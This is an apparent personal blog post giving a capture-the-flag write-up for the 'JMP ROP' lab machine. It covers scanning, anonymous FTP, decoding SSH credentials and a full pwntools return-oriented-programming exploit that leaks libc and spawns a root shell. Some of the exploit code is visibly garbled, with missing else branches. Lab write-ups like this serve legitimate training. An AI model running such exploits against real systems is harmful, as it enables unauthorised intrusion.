home / devploit

Personal page about infosec stuff and projects.

Home Posts Repositories About
14 June 2019

JMP ROP - uad360

by devploit

0x01 Challenge:

Level: Medium



Get user and root flags. author: torombolo

0x02 User write-up:

We start by scanning the IP to get active services.

➜ nmap -sV -Pn -T5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-14 10:40 BST
Nmap scan report for
Host is up (0.00045s latency).
Not shown: 997 closed ports
21/tcp open  ftp     vsftpd 2.3.5
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
MAC Address: 52:54:00:5E:DD:46 (QEMU virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.71 seconds

If we try to log into the FTP service with credencials anonymous:(blank), we can see a downloadable b64.txt file.

Connected to
220 (vsFTPd 2.3.5)
Name ( anonymous
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            13 Jun 11 07:05 b64.txt
226 Directory send OK.
ftp> get b64.txt
local: b64.txt remote: b64.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for b64.txt (13 bytes).
226 Transfer complete.
13 bytes received in 0.00 secs (9.7506 kB/s)
ftp> exit
221 Goodbye.

Reviewing the content we see only one word with a /, which first may indicate that it refers to a directory. Looking again at the services we can guess that it is a web directory but it does not work by itself, but as the name of the file indicates, we must pass it to base64.

cat b64.txt | base64


We download the document and see that it contains an encoded / encrypted string.


After a bit of searching and with the help of our friend cyberchef we verified that it is a base85 that gives us the ssh credentials to the user.


ssh shon@ 
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:aVdX11T+OcqIBcidwkultxyGsvTM5XFcIuYRgJwXTSw.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
shon@'s password: 
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-117-generic i686)

 * Documentation:  https://help.ubuntu.com/

New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Your Hardware Enablement Stack (HWE) is supported until April 2017.

This Ubuntu 12.04 LTS system is past its End of Life, and is no longer
receiving security updates.  To protect the integrity of this system, it’s
critical that you enable Extended Security Maintenance updates:
 * https://www.ubuntu.com/esm

Last login: Sat Jun  8 16:11:43 2019 from
shon@jmp-rop:~$ cat user.txt
shon@jmp-rop:~$ JEJE

User flag: uad360{FlagSwag1337}

0x03 Root write-up:

For the privilege escalation the name of the machine helps us to guide us by where it goes, so we list the files that have sticky bit.

shon@jmp-rop:~$ find / -perm -4000 2>/dev/null
/usr/bin/ropme <----------------------

The goal is clear! We download the file and we try to exploit it. To exploit this rop has been used a exploit from Julianjm.

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template --host --user shon --pass elheraldodeshon /usr/bin/ropme
from pwn import *

exe = context.binary = ELF('./ropme')

host = args.HOST or ''
port = int(args.PORT or 22)
user = args.USER or 'shon'
password = args.PASSWORD or 'elheraldodeshon'
remote_path = '/usr/bin/ropme'

# Connect to the remote SSH server
shell = None
if not args.LOCAL:
    shell = ssh(user, host, port, password)

def local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug(["./ropme"] + argv, gdbscript=gdbscript, *a, **kw)
        return process(["./ropme"] + argv, *a, **kw)

def remote(argv=[], *a, **kw):
    '''Execute the target binary on the remote host'''
    if args.GDB:
        return gdb.debug([remote_path] + argv, gdbscript=gdbscript, ssh=shell, *a, **kw)
        return shell.process([remote_path] + argv, *a, **kw)

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return local(argv, *a, **kw)
        return remote(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
# gdbscript = '''
# break *0x{exe.symbols.main:x}
# continue
# '''.format(**locals())

#                    EXPLOIT GOES HERE
# Arch:     i386-32-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      No PIE (0x8048000)

gadget_pop_ebx = pack(0x08048364)

# Primer payload. Leak de la direcciónde puts, y vuelta a main
payload = "A" * 0x70
payload+= pack(exe.symbols['puts']) # Llamada a puts
payload+= gadget_pop_ebx            # Retorno: Limpiamos 1 parámetro de la pila
payload+= pack(exe.got['puts'])     # Arg1 para la llamada a puts
payload+= pack(exe.symbols['main']) # Llamamos a main para una segunda vuelta

io = start()

puts_leak = unpack(io.recv(4))
log.info("PUTS: 0x%08x", puts_leak)

# Los siguientes offsets se calculan con objdump:
# objdump -T libc.so | grep puts
if args.LOCAL:
    libc_base = puts_leak - 0x000690a0
    binsh = libc_base + 0x17eaaa
    system = libc_base + 0x0003e9e0
    libc_base = puts_leak - 0x00066830
    binsh = libc_base + 0x1636a0
    system = libc_base + 0x0003f0b0

# Segundo payload. Llamamos a system("/bin/sh")
payload = "A" * 0x70
payload+= pack(system)
payload+= "AAAA"
payload+= pack(binsh)



Once we use it with the correct settings, we will see this output in terminal.

python exploit.py
[*] '/Users/dpua/Downloads/ropme'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)
[+] Connecting to on port 22: Done
[*] shon@
    Distro    Ubuntu 12.04
    OS:       linux
    Arch:     i386
    Version:  3.13.0
    ASLR:     Enabled
[+] Opening new channel: 'pwd': Done
[+] Receiving all data: Done (11B)
[*] Closed SSH channel with
[*] Working directory: '/tmp/tmp.xJXsCtT2b8'
[+] Opening new channel: 'ln -s /home/shon/* .': Done
[+] Receiving all data: Done (0B)
[*] Closed SSH channel with
[+] Starting remote process '/usr/bin/ropme' on pid 9718
[*] PUTS: 0xb7684830
[*] Switching to interactive mode
2 + 2 = ?
# $ whoami
# $ cat /root/root.txt
# $

Finally we got the root flag.

Root flag: uad360{T0r0mb0l0R3turns1337}

tags: ctf - uad360 - boot2root - rop